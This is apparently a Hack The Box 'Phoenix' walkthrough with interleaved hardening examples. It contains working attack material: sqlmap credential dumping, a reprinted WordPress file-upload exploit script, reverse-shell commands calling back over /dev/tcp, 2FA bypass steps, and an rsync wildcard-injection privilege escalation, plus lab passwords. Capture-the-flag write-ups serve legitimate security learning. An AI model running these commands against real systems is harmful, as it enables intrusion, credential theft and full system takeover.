Hack_The_Box_Writeups

HackTheBox – Phoenix Walkthrough – In English

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nmap -A 10.10.11.149

https://phoenix.htb/

Click on details -> click on Go to Blog.

https://phoenix.htb/?post_type=post

Now click on Forums.

https://phoenix.htb/forum/

https://phoenix.htb/forum/members/

┌──(root㉿kali)-[/home/kali/Downloads]

└─# wpscan --url https://phoenix.htb/ --disable-tls-checks --enumerate u

https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1

┌──(root㉿kali)-[/home/kali/Downloads]

└─# sqlmap --url "https://phoenix.htb/forum/?subscribe_topic=1" --level 3 --risk 3 --batch --dbms MySQL --dbs

┌──(root㉿kali)-[/home/kali/Downloads]

└─# sqlmap --url "https://phoenix.htb/forum/?subscribe_topic=1" --level 3 --risk 3 --batch --dbms MySQL -D wordpress --tables

┌──(root㉿kali)-[/home/kali/Downloads]

└─# sqlmap --url "https://phoenix.htb/forum/?subscribe_topic=1" --level 3 --risk 3 --batch --dbms MySQL -D wordpress -T wp_users --columns

┌──(root㉿kali)-[/home/kali/Downloads]

└─# sqlmap --url "https://phoenix.htb/forum/?subscribe_topic=1" --level 3 --risk 3 --batch --dbms MySQL -D wordpress -T wp_users -C user_login,user_pass --dump

┌──(root㉿kali)-[/home/kali/Downloads]

└─# john hash --wordlist=rockyou.txt

Cracking the hash gives us the credential:

superphoenix

https://www.exploit-db.com/raw/50287

Content:

# Exploit Title: WordPress Plugin Download From Files 1.48 - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/download-from-files
# Date: 10/09/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugins/download-from-files/
# Version: <= 1.48
# Tested on: Ubuntu 20.04.1 LTS (x86)

from os import path
import requests
import sys


def print_banner():
    print("Download From Files <= 1.48 - Arbitrary File Upload")
    print("Author -> spacehen (www.github.com/spacehen)")


def print_usage():
    print("Usage: python3 exploit.py [target url] [php file]")
    print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")


def vuln_check(uri):
    # The plugin's upload action answers a plain, unauthenticated GET with the
    # string "Sikeres" (Hungarian for "successful"), which is used as the fingerprint.
    response = requests.get(uri, verify=False)
    return "Sikeres" in response.text


def main():
    print_banner()
    if len(sys.argv) != 3:
        print_usage()
        sys.exit(1)

    base = sys.argv[1]
    file_path = sys.argv[2]
    ajax_action = 'download_from_files_617_fileupload'
    admin = '/wp-admin/admin-ajax.php'
    uri = base + admin + '?action=' + ajax_action

    if not vuln_check(uri):
        print("(*) Target not vulnerable!")
        sys.exit(1)

    if not path.isfile(file_path):
        print("(*) Invalid file!")
        sys.exit(1)

    # The extension allowlist, size limit and destination directory are all
    # taken from the request body, which is the root cause of the bug.
    files = {'files[]': open(file_path, 'rb')}
    data = {
        "allowExt": "php4,phtml",
        "filesName": "files",
        "maxSize": "1000",
        "uploadDir": "."
    }

    print("Uploading Shell...")
    response = requests.post(uri, files=files, data=data, verify=False)
    file_name = path.basename(file_path)

    if "ok" in response.text:
        print("Shell Uploaded!")
        if base[-1] != '/':
            base += '/'
        print(base + "wp-admin/" + file_name)
    else:
        print("Shell Upload Failed")
        sys.exit(1)


main()

┌──(root㉿kali)-[/home/kali/Downloads]

└─# cat shell.phtml

┌──(root㉿kali)-[/home/kali/Downloads]

└─# python3 exploit.py https://phoenix.htb/ shell.phtml

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nc -nlvp 1234

┌──(root㉿kali)-[/home/kali/Downloads]

└─# curl -k https://phoenix.htb/wp-admin/shell.phtml --data-urlencode 'cmd=bash -c "bash -i >& /dev/tcp/10.10.14.102/1234 0>&1"'
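For contrast with what the exploit above relies on, here is an added illustration of how an admin-ajax upload handler looks when the request carries no authority over the upload policy. This is not the Download From Files plugin's code: the hook name, nonce action, form field name and allowlist are assumed for the example, and it only runs inside WordPress.

```php
<?php
// Added illustration, not the Download From Files plugin's code. The handler is
// written so that the request parameters the exploit sends (allowExt, uploadDir,
// maxSize) carry no authority. Hook name, nonce action, field name and the
// allowlist are assumed for the example.

// Only the authenticated hook is registered; there is deliberately no
// wp_ajax_nopriv_ counterpart, so anonymous callers never reach the function.
add_action('wp_ajax_example_fileupload', 'example_fileupload');

function example_fileupload() {
    // CSRF protection: the nonce must come from a form rendered for this action.
    check_ajax_referer('example_fileupload', 'nonce');

    // Authorisation: being logged in is not enough; require a capability.
    if (!current_user_can('upload_files')) {
        wp_send_json_error('forbidden', 403);
    }

    if (empty($_FILES['file']) || !is_uploaded_file($_FILES['file']['tmp_name'])) {
        wp_send_json_error('no file', 400);
    }
    $file = $_FILES['file'];

    // Server-side policy. $_POST['allowExt'], $_POST['maxSize'] and
    // $_POST['uploadDir'] are never read.
    $allowed   = array('pdf' => 'application/pdf', 'png' => 'image/png');
    $max_bytes = 1024 * 1024;

    if ($file['size'] > $max_bytes) {
        wp_send_json_error('too large', 413);
    }

    // Extension checked against the allowlist (so shell.phtml or shell.php4 is
    // refused); for image types WordPress also inspects the file content.
    $check = wp_check_filetype_and_ext($file['tmp_name'], $file['name'], $allowed);
    if (empty($check['ext']) || empty($check['type'])) {
        wp_send_json_error('type not allowed', 415);
    }

    // wp_handle_upload() moves the file into the uploads directory; the client
    // cannot steer it into wp-admin or any other web-executable path.
    $result = wp_handle_upload($file, array('test_form' => false, 'mimes' => $allowed));
    if (isset($result['error'])) {
        wp_send_json_error($result['error'], 500);
    }
    wp_send_json_success(array('url' => $result['url']));
}
```

The three things the exploit depends on map onto the three checks: it sends no session cookie or nonce, so the handler must authenticate and require a capability; it chooses allowExt=php4,phtml, so the allowlist has to live server-side; and it picks uploadDir=., so the destination must be fixed by the server rather than the client.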

bash-5.0$ cd /opt

bash-5.0$ ls -lrt

bash-5.0$ cd wordpress

GET OTP KEY

There is 2FA on the /wp-admin login page, so we look at how to bypass it, or simply recover the OTP key.

The encrypt and decrypt functions are in the source of the miniorange plugin, at handler/twofa/two_fa_utility.php.

The WordPress database login can be grabbed from the wp-config.php file:

bash-5.0$ cd ..

bash-5.0$ cat wp-config.php

Password: <++32%himself%FIRM%section%32++>

then connect to mysql to get more information:

bash-5.0$ script /dev/null -c bash

bash-5.0$ mysql -uwordpress -p

Enter password: <++32%himself%FIRM%section%32++>

mysql> show databases;

mysql> use wordpress;

mysql> select meta_value from wp_usermeta WHERE meta_key IN ('mo2f_gauth_key');

mysql> select meta_value from wp_usermeta WHERE meta_key IN ('mo2f_get_auth_rnd_string');

Then a short PHP decrypt script (using the first value as the data and the second as the key) recovers the OTP key:

┌──(root㉿kali)-[/home/kali/Downloads]

└─# cat epp.php

Content:

<?php
function decrypt_data($data, $key) {
    // Blob layout used by the plugin: base64( IV || HMAC-SHA256 || ciphertext ), AES-128-CBC
    $c = base64_decode($data);
    $cipher = "AES-128-CBC";
    $ivlen = openssl_cipher_iv_length($cipher);
    $iv = substr($c, 0, $ivlen);
    $sha2len = 32;
    $hmac = substr($c, $ivlen, $sha2len);
    $ciphertext_raw = substr($c, $ivlen + $sha2len);
    $original_plaintext = openssl_decrypt($ciphertext_raw, $cipher, $key, OPENSSL_RAW_DATA, $iv);
    // The MAC is recomputed but never compared in this script.
    $calcmac = hash_hmac('sha256', $ciphertext_raw, $key, true);
    return $original_plaintext;
}

echo decrypt_data("qGEPwI6RQBxF4aXM6PVuriofiwCH4mjc4ZjO3jWN5gDDX5MzLHTfDk3tRGK7vwkkTbAjoxNfqFeMjJZoSI5yPF25Hd5b8lSaF/Dpc6WMBTA=", "kHHxxX3f");
?>

┌──(root㉿kali)-[/home/kali/Downloads]

└─# php epp.php
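As an added example (not the miniorange plugin's code and not the epp.php script above), the same blob layout with the integrity check carried through, plus an encrypt side to produce test blobs. The lesson of the two queries above is the part no MAC fixes: the key (mo2f_get_auth_rnd_string) sits in the same wp_usermeta table as the encrypted seed (mo2f_gauth_key), so anyone who can read the database can decrypt the seed. What the HMAC does add is that a tampered blob, or one tried against the wrong key, is rejected before openssl_decrypt ever runs. The key and secret below are constructed, not the values from the box.

```php
<?php
// Added example: base64( IV || HMAC-SHA256 || ciphertext ) with AES-128-CBC, the
// layout the walkthrough's decrypt_data() unpacks, but with the tag verified.
// Key and secret are constructed demo values.

function encrypt_data(string $plaintext, string $key): string {
    $cipher = "AES-128-CBC";
    $iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length($cipher));
    $ciphertext_raw = openssl_encrypt($plaintext, $cipher, $key, OPENSSL_RAW_DATA, $iv);
    // Encrypt-then-MAC: the tag covers the raw ciphertext, matching the page's decrypt routine.
    $hmac = hash_hmac('sha256', $ciphertext_raw, $key, true);
    return base64_encode($iv . $hmac . $ciphertext_raw);
}

function decrypt_data_verified(string $data, string $key): ?string {
    $cipher = "AES-128-CBC";
    $ivlen = openssl_cipher_iv_length($cipher);
    $sha2len = 32;
    $c = base64_decode($data, true);                 // strict mode: reject non-base64 input
    if ($c === false || strlen($c) < $ivlen + $sha2len) {
        return null;                                 // too short to hold IV and tag
    }
    $iv = substr($c, 0, $ivlen);
    $hmac = substr($c, $ivlen, $sha2len);
    $ciphertext_raw = substr($c, $ivlen + $sha2len);
    $calcmac = hash_hmac('sha256', $ciphertext_raw, $key, true);
    // Constant-time comparison; on mismatch nothing is decrypted, so there is no
    // padding-oracle surface and a wrong key is caught here as well.
    if (!hash_equals($calcmac, $hmac)) {
        return null;
    }
    $plaintext = openssl_decrypt($ciphertext_raw, $cipher, $key, OPENSSL_RAW_DATA, $iv);
    return $plaintext === false ? null : $plaintext;
}

// Constructed demo values (16-byte key = a full AES-128 key; the secret stands in for a TOTP seed).
$key    = "0123456789abcdef";
$secret = "EXAMPLEBASE32SECRET";

$blob = encrypt_data($secret, $key);
var_dump(decrypt_data_verified($blob, $key) === $secret);

// Flip one bit in the ciphertext part of the blob: the MAC check fails and null comes back.
$raw = base64_decode($blob);
$raw[strlen($raw) - 1] = chr(ord($raw[strlen($raw) - 1]) ^ 0x01);
var_dump(decrypt_data_verified(base64_encode($raw), $key));

// Wrong key: the tag is keyed with the same key, so this also fails before decryption.
var_dump(decrypt_data_verified($blob, "fedcba9876543210"));
```

Run it with `php` as the walkthrough does for epp.php: the first dump is true, the other two are null. The order of operations is the point; verifying the tag before touching openssl_decrypt is what keeps a CBC decryptor from becoming an oracle.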

bash-5.0$ cd /etc/pam.d

bash-5.0$ ls

We can completely bypass the 2FA by renaming the plugin over at /opt/wordpress/, but that doesn't get us much further than we already are.

Instead, back to SSH: we can look at bypassing the 2FA there (for SSH this time, not WordPress). In the ssh config under /etc/pam.d/ we see a reference to an accessfile:

read more about it:

https://manpages.ubuntu.com/manpages/bionic/man8/pam_google_authenticator.8.html

bash-5.0$ cat /etc/security/access-local.conf

We need to connect from an IP on the 10.11.2.13/24 subnet, which we can't do from our machine or from the other machine locally, so we use the ssh command from the wp_user shell:
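For reference, an illustrative PAM layout of the kind the linked man page describes, added here to show where the subnet exemption comes from: the pam_access line is what turns "connecting from a trusted subnet" into a skip of the authenticator. These are example files, not the box's actual /etc/pam.d entries or its access-local.conf, and the subnet is constructed.

```text
# /etc/pam.d/sshd (illustrative)
#
# Weak: if the client address matches access-local.conf, success=1 jumps over
# the next line, so the authenticator never runs. A foothold on any host in
# that subnet is therefore a full 2FA bypass for SSH.
auth [success=1 default=ignore] pam_access.so accessfile=/etc/security/access-local.conf
auth required                   pam_google_authenticator.so nullok

# /etc/security/access-local.conf (illustrative; subnet constructed)
# permit this subnet without 2FA, everyone else goes through the authenticator
+ : ALL : 10.11.2.0/24
- : ALL : ALL

# Hardened: no address-based exemption, and nullok removed so an account that
# has not enrolled a token cannot log in with the password alone.
auth required pam_google_authenticator.so
```

If an exemption is genuinely needed, keep it to the narrowest set of source addresses that actually require it and review access-local.conf with the same care as sshd_config; the box treats a whole /24 as trusted, which is why reaching any host on it is enough.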

We finally SSH over to the box, reusing editor's password:

bash-5.0$ ssh editor@10.11.12.13

Password: superphoenix

-bash-5.0$ id

-bash-5.0$ cd /home

-bash-5.0$ ls -lrt

-bash-5.0$ cd editor

-bash-5.0$ cat user.txt

-bash-5.0$ cd /dev/shm

-bash-5.0$ find /usr/local/bin/ -perm -o=x -type f 2>/dev/null

-bash-5.0$ file /usr/local/bin/cron.sh.x

https://gtfobins.github.io/gtfobins/rsync/

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nc -nlvp 443

-bash-5.0$ cd /backups

-bash-5.0$ file /usr/local/bin/cron.sh.x

-bash-5.0$ cd /usr/local/bin

-bash-5.0$ ./cron.sh.x

In another session, pspy shows the cron job firing.

-bash-5.0$ echo -e '#!/bin/bash\n\nbash -i >& /dev/tcp/10.10.14.102/443 0>&1' > test.sh; touch -- '-e bash test.sh'

-bash-5.0$ ls -la

After 3 minutes we get the root shell.

Hi, I'm saksham dixit
